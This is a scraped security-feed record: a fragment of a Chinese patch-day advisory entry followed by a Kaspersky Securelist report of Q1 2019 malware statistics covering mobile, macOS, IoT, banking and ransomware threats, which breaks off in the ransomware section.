\n\n0x01 timeline \n2019-03-13 Microsoft issued a routine security update \n2019-03-15 360CERT assessment of vulnerabilities, post vulnerabilities and Early Warning Bulletin \n\n", "edition": 1, "modified": "2019-03-17T00:00:00", "published": "2019-03-17T00:00:00", "id": "MYHACK58:62201993173", "href": "http://www.myhack58.com/Article/html/3/62/2019/93173.htm", "title": "By 2019, 3-month Microsoft patch day multiple vulnerabilities early warning-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2019-05-29T14:29:14", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-20250", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.\n * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.\n * Ransomware attacks were defeated on the computers of 284,489 unique users.\n * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 905,174 malicious installation packages\n * 29,841 installation packages for mobile banking Trojans\n * 27,928 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ1 2019 is remembered mainly for mobile financial threats.\n\nFirst, the operators of the 
Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:\n\n_{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_ \n_{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_ \n_{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_ \n_{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_\n\nSecond, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)\n\nAlthough such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.\n\n### Mobile threat statistics\n\nIn Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.\n\n_Number of detected malicious installation packages, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)\n\n#### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)\n\nAmong all the threats detected in Q1 2019, the lion's share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. 
The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.\n\nIn second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.\n\nThe share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.\n\nThe statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.\n\nThe most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 54.26 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.72 \n3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 \n4 | DangerousObject.AndroidOS.GenericML | 4.35 \n5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 \n6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 \n7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 \n8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 \n9 | Trojan.AndroidOS.Dvmap.a | 1.84 \n10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 \n11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 \n12 | Trojan.AndroidOS.Agent.eb | 1.74 \n13 | 
Trojan.AndroidOS.Agent.rt | 1.72 \n14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 \n15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 \n16 | Exploit.AndroidOS.Lotoor.be | 1.59 \n17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 \n18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 \n19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 \n20 | Trojan.AndroidOS.Triada.dl | 1.47 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._\n\nAs is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).\n\nThe DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions before such files go for processing. 
The latest threat patterns are now detected this way.\n\nSixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.\n\nSeventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:\n\n * It is extremely difficult for an ordinary user to determine whether their device is already infected.\n * Getting rid of such malware is highly complex.\n\nThe Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.\n\nThe last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. 
It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. 
It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. 
But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. 
Neither type of malware is exclusive to Australia; both are used in attacks worldwide.\n\nSecond place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.\n\nRussia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.\n\n### Mobile ransomware\n\nIn Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.\n\n_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 \u2013 Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 \n2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 \n3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 \n4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 \n5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 \n7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 \n8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 \n9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 \n10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._\n\nIn Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.\n\n_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)\n\nTop 10 countries by share of users attacked by mobile ransomware:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.54 \n2 | Kazakhstan | 0.36 \n3 | Iran | 0.28 \n4 | Pakistan | 0.14 \n5 | Mexico | 0.10 \n6 | Saudi Arabia | 0.10 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Indonesia | 0.05 \n10 | Belgium | 0.05 \n \n_* Excluded from the rating are 
countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nThe Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%).\n\n## Attacks on Apple macOS\n\nOn the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.\n\nThe modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:\n\n 1. The code that displays the advertising banner to run as often as possible on the infected machine,\n 2. The victim to click on the banners as often as possible,\n 3. As many victims as possible.\n\nIt should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. 
Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 \n2 | AdWare.OSX.Spc.a | 20.07 \n3 | AdWare.OSX.Pirrit.j | 10.31 \n4 | AdWare.OSX.Pirrit.p | 8.44 \n5 | AdWare.OSX.Agent.b | 8.03 \n6 | AdWare.OSX.Pirrit.o | 7.45 \n7 | AdWare.OSX.Pirrit.s | 6.88 \n8 | AdWare.OSX.Agent.c | 6.03 \n9 | AdWare.OSX.MacSearch.a | 5.95 \n10 | AdWare.OSX.Cimpli.d | 5.72 \n11 | AdWare.OSX.Mcp.a | 5.71 \n12 | AdWare.OSX.Pirrit.q | 5.55 \n13 | AdWare.OSX.MacSearch.d | 4.48 \n14 | AdWare.OSX.Agent.a | 4.39 \n15 | Downloader.OSX.InstallCore.ab | 3.88 \n16 | AdWare.OSX.Geonei.ap | 3.75 \n17 | AdWare.OSX.MacSearch.b | 3.48 \n18 | AdWare.OSX.Geonei.l | 3.42 \n19 | AdWare.OSX.Bnodlero.q | 3.33 \n20 | RiskTool.OSX.Spigot.a | 3.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._\n\nTrojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.\n\nAdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various \"cleaner\" programs for macOS. After installation, they write themselves to the autoloader and run in the background.\n\nMembers of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser. 
All this serves one purpose \u2013 to inject advertising into web pages viewed by the user.\n\nThe malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.\n\nAdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user's knowledge.\n\nAdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.\n\nThe creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.\n\nThe AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. 
As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web page.\n\nLike other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.54 \n2 | Spain | 9.75 \n3 | India | 8.83 \n4 | Italy | 8.20 \n5 | US | 8.03 \n6 | Canada | 7.94 \n7 | UK | 7.52 \n8 | Russia | 7.51 \n9 | Brazil | 7.45 \n10 | Mexico | 6.99 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._\n\nIn Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a and AdWare.OSX.Bnodlero.q.\n\nUsers from Spain (9.75%), India (8.83%), and Italy (8.20%) \u2013 who ranked second, third, and fourth, respectively \u2013 most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b.\n\nFifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Cimpli family.\n\n## IoT attacks\n\n### Interesting events\n\nIn Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. 
The implementation was primitive \u2013 scanning for the presence of procfs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)\n\nBut we expect it to become more complex in the near future.\n\nSecond, one of the versions of Mirai was found to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain \"mirai\" in the process name):\n\n * dvrhelper\n * dvrsupport\n * **mirai**\n * blade\n * demon\n * hoho\n * hakai\n * satori\n * messiah\n * mips\n\nLastly, a few words about a miner that uses an old exploit for Oracle WebLogic Server; it is not actually IoT malware but a Trojan for Linux.\n\nTaking advantage of the fact that WebLogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)\n\n_Section of code responsible for attacking Windows and Linux hosts_\n\n### IoT threat statistics\n\nQ1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that this has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come. 
\n \nSSH | 17% \nTelnet | 83% \n \n_Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_\n\nNevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab's traps. \n \nSSH | 64% \nTelnet | 36% \n \n_Table of distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_\n\nIf attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)\n\nTop 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | Egypt | 13.46 \n2 | China | 13.19 \n3 | Brazil | 11.09 \n4 | Russia | 7.17 \n5 | Greece | 4.45 \n6 | Jordan | 4.14 \n7 | US | 4.12 \n8 | Iran | 3.24 \n9 | India | 3.14 \n10 | Turkey | 2.49 \n \n_* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet._\n\nIn Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps. 
Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.\n\nCybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.\n\n**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 71.39 \n2 | Backdoor.Linux.Mirai.ba | 20.15 \n3 | Backdoor.Linux.Mirai.au | 4.85 \n4 | Backdoor.Linux.Mirai.c | 1.35 \n5 | Backdoor.Linux.Mirai.h | 1.23 \n6 | Backdoor.Linux.Mirai.bj | 0.72 \n7 | Trojan-Downloader.Shell.Agent.p | 0.06 \n8 | Backdoor.Linux.Hajime.b | 0.06 \n9 | Backdoor.Linux.Mirai.s | 0.06 \n10 | Backdoor.Linux.Gafgyt.bj | 0.04 \n \n_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack_\n\nIt is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)\n\nTop 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | China | 23.24 \n2 | US | 9.60 \n3 | Russia | 6.07 \n4 | Brazil | 5.31 \n5 | Germany | 4.20 \n6 | Vietnam | 4.11 \n7 | France | 3.88 \n8 | India | 3.55 \n9 | Egypt | 2.53 \n10 | Korea | 2.10 \n \n_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH_\n\nMost often, a successful SSH-based attack resulted in the following types of malware being downloaded to the victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p.\n\n## Financial threats\n\n### Quarterly 
highlights\n\nThe banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.\n\nRecall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.\n\n### Financial threat statistics\n\nIn Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.\n\n_Number of unique users attacked by financial malware, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country*** | **%**** \n---|--- \nSouth Korea | 2.2 \nChina | 2.1 \nBelarus | 1.6 \nVenezuela | 1.6 \nSerbia | 1.6 \nGreece | 1.5 \nEgypt | 1.4 \nPakistan | 1.3 \nCameroon | 1.3 \nZimbabwe | 1.3 \n \n_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._ \n_** Unique users whose computers were targeted by 
banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 27.42 \n2 | Zbot | Trojan.Win32.Zbot | 22.86 \n3 | Emotet | Backdoor.Win32.Emotet | 9.36 \n4 | Trickster | Trojan.Win32.Trickster | 6.57 \n5 | Nymaim | Trojan.Win32.Nymaim | 5.85 \n6 | Nimnul | Virus.Win32.Nimnul | 4.59 \n7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 \n8 | Neurevt | Trojan.Win32.Neurevt | 3.56 \n9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 \n10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 \n \n_* Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because once a network has been penetrated, instead of deploying ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.\n\nA vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. 
The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.\n\nFebruary saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storage (NAS) devices, in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.\n\nNomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.\n\n### Statistics\n\n#### Number of new modifications\n\nThe number of new modifications fell markedly against Q4 2018 to the level of Q3. 
